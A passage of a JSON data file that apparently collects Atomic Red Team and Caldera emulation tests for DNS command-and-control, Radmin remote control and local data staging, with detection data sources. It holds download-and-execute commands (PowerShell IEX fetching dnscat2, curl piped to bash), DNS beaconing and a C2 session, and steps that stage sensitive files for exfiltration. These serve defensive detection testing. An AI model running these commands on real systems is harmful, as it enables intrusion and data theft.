-Domain #{domain} -Subdomain atomicredteam -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + "Set-Location PathToAtomicsFolder\n.\\T1071.004\\src\\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType TXT -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + "Set-Location PathToAtomicsFolder\n.\\T1071.004\\src\\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType TXT\n", + "Set-Location 
PathToAtomicsFolder\n.\\T1071.004\\src\\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain atomicredteamatomicredteamatomicredteamatomicredteamatomicredte -QueryType #{query_type}\n", + "Set-Location PathToAtomicsFolder\n.\\T1071.004\\src\\T1071-dns-domain-length.ps1 -Domain 127.0.0.1.xip.io -Subdomain #{subdomain} -QueryType #{query_type}\n", + "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')\nStart-Dnscat2 -Domain example.com -DNSServer #{server_ip}\n", + "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')\nStart-Dnscat2 -Domain #{domain} -DNSServer 127.0.0.1\n" + ], + "commands": [ + { + "command": "for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type \"TXT\" \"#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}\" -QuickTimeout}\n", + "source": "atomics/T1071.004/T1071.004.yaml", + "name": "Atomic Red Team Test - Application Layer Protocol: DNS" + }, + { + "command": "for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type \"#{query_type}\" \"atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}\" -QuickTimeout}\n", + "source": "atomics/T1071.004/T1071.004.yaml", + "name": "Atomic Red Team Test - Application Layer Protocol: DNS" + }, + { + "command": null, + "source": "atomics/T1071.004/T1071.004.yaml", + "name": "Atomic Red Team Test - Application Layer Protocol: DNS" + }, + { + "command": "for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type \"#{query_type}\" \"#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).127.0.0.1.xip.io\" -QuickTimeout}\n", + "source": "atomics/T1071.004/T1071.004.yaml", + "name": "Atomic Red Team Test - Application Layer Protocol: DNS" + }, + { + "command": "Set-Location 
PathToAtomicsFolder\n.\\T1071.004\\src\\T1071-dns-beacon.ps1 -Domain 127.0.0.1.xip.io -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + "source": "atomics/T1071.004/T1071.004.yaml", + "name": "Atomic Red Team Test - Application Layer Protocol: DNS" + }, + { + "command": "Set-Location PathToAtomicsFolder\n.\\T1071.004\\src\\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain atomicredteam -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + "source": "atomics/T1071.004/T1071.004.yaml", + "name": "Atomic Red Team Test - Application Layer Protocol: DNS" + }, + { + "command": "Set-Location PathToAtomicsFolder\n.\\T1071.004\\src\\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType TXT -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + "source": "atomics/T1071.004/T1071.004.yaml", + "name": "Atomic Red Team Test - Application Layer Protocol: DNS" + }, + { + "command": "Set-Location PathToAtomicsFolder\n.\\T1071.004\\src\\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType TXT\n", + "source": "atomics/T1071.004/T1071.004.yaml", + "name": "Atomic Red Team Test - Application Layer Protocol: DNS" + }, + { + "command": "Set-Location PathToAtomicsFolder\n.\\T1071.004\\src\\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain atomicredteamatomicredteamatomicredteamatomicredteamatomicredte -QueryType #{query_type}\n", + "source": "atomics/T1071.004/T1071.004.yaml", + "name": "Atomic Red Team Test - Application Layer Protocol: DNS" + }, + { + "command": "Set-Location PathToAtomicsFolder\n.\\T1071.004\\src\\T1071-dns-domain-length.ps1 -Domain 127.0.0.1.xip.io -Subdomain #{subdomain} -QueryType #{query_type}\n", + "source": "atomics/T1071.004/T1071.004.yaml", + "name": "Atomic Red Team Test - Application Layer Protocol: DNS" + }, + { + "command": "IEX (New-Object 
System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')\nStart-Dnscat2 -Domain example.com -DNSServer #{server_ip}\n", + "source": "atomics/T1071.004/T1071.004.yaml", + "name": "Atomic Red Team Test - Application Layer Protocol: DNS" + }, + { + "command": "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')\nStart-Dnscat2 -Domain #{domain} -DNSServer 127.0.0.1\n", + "source": "atomics/T1071.004/T1071.004.yaml", + "name": "Atomic Red Team Test - Application Layer Protocol: DNS" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1071.004", + "display_name": "Application Layer Protocol: DNS", + "atomic_tests": [ + { + "name": "DNS Large Query Volume", + "auto_generated_guid": "1700f5d6-5a44-487b-84de-bc66f507b0a6", + "description": "This test simulates an infected host sending a large volume of DNS queries to a command and control server.\nThe intent of this test is to trigger threshold based detection on the number of DNS queries either from a single source system or to a single targe domain.\nA custom domain and sub-domain will need to be passed as input parameters for this test to work. 
Upon execution, DNS information about the domain will be displayed for each callout.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "query_type": { + "description": "DNS query type", + "type": "String", + "default": "TXT" + }, + "subdomain": { + "description": "Subdomain prepended to the domain name", + "type": "String", + "default": "atomicredteam" + }, + "query_volume": { + "description": "Number of DNS queries to send", + "type": "Integer", + "default": 1000 + }, + "domain": { + "description": "Default domain to simulate against", + "type": "String", + "default": "127.0.0.1.xip.io" + } + }, + "executor": { + "command": "for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type \"#{query_type}\" \"#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}\" -QuickTimeout}\n", + "name": "powershell" + } + }, + { + "name": "DNS Regular Beaconing", + "auto_generated_guid": "3efc144e-1af8-46bb-8ca2-1376bb6db8b6", + "description": "This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over time.\nThis behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold based detection.\nA custom domain and sub-domain will need to be passed as input parameters for this test to work. 
Upon execution, DNS information about the domain will be displayed for each callout.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "runtime": { + "description": "Time in minutes to run the simulation", + "type": "Integer", + "default": 30 + }, + "domain": { + "description": "Default domain to simulate against", + "type": "String", + "default": "127.0.0.1.xip.io" + }, + "subdomain": { + "description": "Subdomain prepended to the domain name", + "type": "String", + "default": "atomicredteam" + }, + "query_type": { + "description": "DNS query type", + "type": "String", + "default": "TXT" + }, + "c2_interval": { + "description": "Seconds between C2 requests to the command and control server", + "type": "Integer", + "default": 30 + }, + "c2_jitter": { + "description": "Percentage of jitter to add to the C2 interval to create variance in the times between C2 requests", + "type": "Integer", + "default": 20 + } + }, + "executor": { + "command": "Set-Location PathToAtomicsFolder\n.\\T1071.004\\src\\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + "name": "powershell" + } + }, + { + "name": "DNS Long Domain Query", + "auto_generated_guid": "fef31710-223a-40ee-8462-a396d6b66978", + "description": "This test simulates an infected host returning data to a command and control server using long domain names.\nThe simulation involves sending DNS queries that gradually increase in length until reaching the maximum length. 
The intent is to test the effectiveness of detection of DNS queries for long domain names over a set threshold.\n Upon execution, DNS information about the domain will be displayed for each callout.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "query_type": { + "description": "DNS query type", + "type": "String", + "default": "TXT" + }, + "subdomain": { + "description": "Subdomain prepended to the domain name (should be 63 characters to test maximum length)", + "type": "String", + "default": "atomicredteamatomicredteamatomicredteamatomicredteamatomicredte" + }, + "domain": { + "description": "Default domain to simulate against", + "type": "String", + "default": "127.0.0.1.xip.io" + } + }, + "executor": { + "command": "Set-Location PathToAtomicsFolder\n.\\T1071.004\\src\\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}\n", + "name": "powershell" + } + }, + { + "name": "DNS C2", + "auto_generated_guid": "e7bf9802-2e78-4db9-93b5-181b7bcd37d7", + "description": "This will attempt to start a C2 session using the DNS protocol. 
You will need to have a listener set up and create DNS records prior to executing this command.\nThe following blogs have more information.\n\nhttps://github.com/iagox86/dnscat2\n\nhttps://github.com/lukebaggett/dnscat2-powershell\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "domain": { + "description": "Domain Name configured to use DNS Server where your C2 listener is running", + "type": "String", + "default": "example.com" + }, + "server_ip": { + "description": "IP address of DNS server where your C2 listener is running", + "type": "String", + "default": "127.0.0.1" + } + }, + "executor": { + "command": "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')\nStart-Dnscat2 -Domain #{domain} -DNSServer #{server_ip}\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1072", + "command_list": [ + "\"#{radmin_exe}\"", + "\"%PROGRAMFILES(x86)%/Radmin Viewer 3/Radmin.exe\"" + ], + "commands": [ + { + "command": "\"#{radmin_exe}\"", + "source": "atomics/T1072/T1072.yaml", + "name": "Atomic Red Team Test - Software Deployment Tools" + }, + { + "command": "\"%PROGRAMFILES(x86)%/Radmin Viewer 3/Radmin.exe\"", + "source": "atomics/T1072/T1072.yaml", + "name": "Atomic Red Team Test - Software Deployment Tools" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1072", + "display_name": "Software Deployment Tools", + "atomic_tests": [ + { + "name": "Radmin Viewer Utility", + "auto_generated_guid": "b4988cad-6ed2-434d-ace5-ea2670782129", + "description": "An adversary may use 
Radmin Viewer Utility to remotely control Windows device, this will start the radmin console.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "radmin_installer": { + "description": "Radmin Viewer installer", + "type": "Path", + "default": "%TEMP%\\RadminViewer.msi" + }, + "radmin_exe": { + "description": "The radmin.exe executable from RadminViewer.msi", + "type": "Path", + "default": "%PROGRAMFILES(x86)%/Radmin Viewer 3/Radmin.exe" + } + }, + "dependencies": [ + { + "description": "Radmin Viewer Utility must be installed at specified location (#{radmin_exe})\n", + "prereq_command": "if not exist \"#{radmin_exe}\" (exit /b 1)\n", + "get_prereq_command": "echo Downloading radmin installer\nbitsadmin /transfer myDownloadJob /download /priority normal \"https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi\" #{radmin_installer}\nmsiexec /i \"#{radmin_installer}\" /qn\n" + } + ], + "executor": { + "name": "command_prompt", + "elevation_required": true, + "command": "\"#{radmin_exe}\"" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4663", + "File monitoring" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Binary file metadata" + ], + [ + "Third-party application logs" + ], + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4663", + "File monitoring" + ], + [ + "4657", + "Windows Registry" + ], + [ + "LOG-MD B9", + "Binary file metadata" + ], + [ + "Third-party application logs" + ], + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application 
log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + "http://www.secureworks.com/resources/blog/living-off-the-land/", + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1074.001", + "command_list": [ + "Invoke-WebRequest \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat\" -OutFile $env:TEMP\\discovery.bat\n", + "curl -s 
https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | bash -s > /tmp/T1074.001_discovery.log\n", + "Compress-Archive -Path #{input_file} -DestinationPath $env:TEMP\\Folder_to_zip.zip -Force\n", + "Compress-Archive -Path PathToAtomicsFolder\\T1074.001\\bin\\Folder_to_zip -DestinationPath #{output_file} -Force\n", + "cp \"#{host.file.path[filters(technique=T1005,max=3)]}\" #{host.dir.staged[filters(max=1)]}\n", + "Copy-Item #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n", + "copy #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n", + "mkdir -p staged && echo $PWD/staged\n", + "New-Item -Path \".\" -Name \"staged\" -ItemType \"directory\" -Force | foreach {$_.FullName} | Select-Object\n" + ], + "commands": [ + { + "command": "Invoke-WebRequest \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat\" -OutFile $env:TEMP\\discovery.bat\n", + "source": "atomics/T1074.001/T1074.001.yaml", + "name": "Atomic Red Team Test - Data Staged: Local Data Staging" + }, + { + "command": "curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | bash -s > /tmp/T1074.001_discovery.log\n", + "source": "atomics/T1074.001/T1074.001.yaml", + "name": "Atomic Red Team Test - Data Staged: Local Data Staging" + }, + { + "command": "Compress-Archive -Path #{input_file} -DestinationPath $env:TEMP\\Folder_to_zip.zip -Force\n", + "source": "atomics/T1074.001/T1074.001.yaml", + "name": "Atomic Red Team Test - Data Staged: Local Data Staging" + }, + { + "command": "Compress-Archive -Path PathToAtomicsFolder\\T1074.001\\bin\\Folder_to_zip -DestinationPath #{output_file} -Force\n", + "source": "atomics/T1074.001/T1074.001.yaml", + "name": "Atomic Red Team Test - Data Staged: Local Data Staging" + }, + { + "command": "cp 
\"#{host.file.path[filters(technique=T1005,max=3)]}\" #{host.dir.staged[filters(max=1)]}\n", + "source": "data/abilities/collection/4e97e699-93d7-4040-b5a3-2e906a58199e.yml", + "name": "copy files to staging directory" + }, + { + "command": "Copy-Item #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n", + "source": "data/abilities/collection/4e97e699-93d7-4040-b5a3-2e906a58199e.yml", + "name": "copy files to staging directory" + }, + { + "command": "copy #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n", + "source": "data/abilities/collection/4e97e699-93d7-4040-b5a3-2e906a58199e.yml", + "name": "copy files to staging directory" + }, + { + "command": "mkdir -p staged && echo $PWD/staged\n", + "source": "data/abilities/collection/6469befa-748a-4b9c-a96d-f191fde47d89.yml", + "name": "create a directory for exfil staging" + }, + { + "command": "New-Item -Path \".\" -Name \"staged\" -ItemType \"directory\" -Force | foreach {$_.FullName} | Select-Object\n", + "source": "data/abilities/collection/6469befa-748a-4b9c-a96d-f191fde47d89.yml", + "name": "create a directory for exfil staging" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1074.001", + "display_name": "Data Staged: Local Data Staging", + "atomic_tests": [ + { + "name": "Stage data from Discovery.bat", + "auto_generated_guid": "107706a5-6f9f-451a-adae-bab8c667829f", + "description": "Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. 
Upon execution,\nverify that the file is saved in the temp directory.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "output_file": { + "description": "Location to save downloaded discovery.bat file", + "type": "Path", + "default": "$env:TEMP\\discovery.bat" + } + }, + "executor": { + "command": "Invoke-WebRequest \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat\" -OutFile #{output_file}\n", + "cleanup_command": "Remove-Item -Force #{output_file} -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Stage data from Discovery.sh", + "auto_generated_guid": "39ce0303-ae16-4b9e-bb5b-4f53e8262066", + "description": "Utilize curl to download discovery.sh and execute a basic information gathering shell script\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "output_file": { + "description": "Location to save downloaded discovery.bat file", + "type": "Path", + "default": "/tmp/T1074.001_discovery.log" + } + }, + "executor": { + "command": "curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | bash -s > #{output_file}\n", + "name": "bash" + } + }, + { + "name": "Zip a Folder with PowerShell for Staging in Temp", + "auto_generated_guid": "a57fbe4b-3440-452a-88a7-943531ac872a", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. 
Upon execution, Verify that a zipped folder named Folder_to_zip.zip\nwas placed in the temp directory.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "output_file": { + "description": "Location to save zipped file or folder", + "type": "Path", + "default": "$env:TEMP\\Folder_to_zip.zip" + }, + "input_file": { + "description": "Location of file or folder to zip", + "type": "Path", + "default": "PathToAtomicsFolder\\T1074.001\\bin\\Folder_to_zip" + } + }, + "executor": { + "command": "Compress-Archive -Path #{input_file} -DestinationPath #{output_file} -Force\n", + "cleanup_command": "Remove-Item -Path #{output_file} -ErrorAction Ignore\n", + "name": "powershell" + } + } + ] + }, + { + "id": "4e97e699-93d7-4040-b5a3-2e906a58199e", + "name": "Stage sensitive files", + "description": "copy files to staging directory", + "tactic": "collection", + "technique": { + "attack_id": "T1074.001", + "name": "Data Staged: Local Data Staging" + }, + "platforms": { + "darwin": { + "sh": { + "command": "cp \"#{host.file.path[filters(technique=T1005,max=3)]}\" #{host.dir.staged[filters(max=1)]}\n" + } + }, + "linux": { + "sh": { + "command": "cp \"#{host.file.path[filters(technique=T1005,max=3)]}\" #{host.dir.staged[filters(max=1)]}\n" + } + }, + "windows": { + "psh": { + "command": "Copy-Item #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n" + }, + "cmd": { + "command": "copy #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.file.path" + } + ] + }, + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.dir.staged" + } + ] + } + ] + }, + { + "id": "6469befa-748a-4b9c-a96d-f191fde47d89", + "name": "Create staging directory", + "description": "create a directory for exfil staging", + "tactic": "collection", + "technique": { + "attack_id": 
"T1074.001", + "name": "Data Staged: Local Data Staging" + }, + "platforms": { + "darwin": { + "sh": { + "command": "mkdir -p staged && echo $PWD/staged\n", + "cleanup": "rm -rf staged\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.dir.staged" + } + ] + } + } + }, + "linux": { + "sh": { + "command": "mkdir -p staged && echo $PWD/staged\n", + "cleanup": "rm -rf staged\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.dir.staged" + } + ] + } + } + }, + "windows": { + "psh,pwsh": { + "command": "New-Item -Path \".\" -Name \"staged\" -ItemType \"directory\" -Force | foreach {$_.FullName} | Select-Object\n", + "cleanup": "Remove-Item -Path \"staged\" -recurse\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.dir.staged" + } + ] + } + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
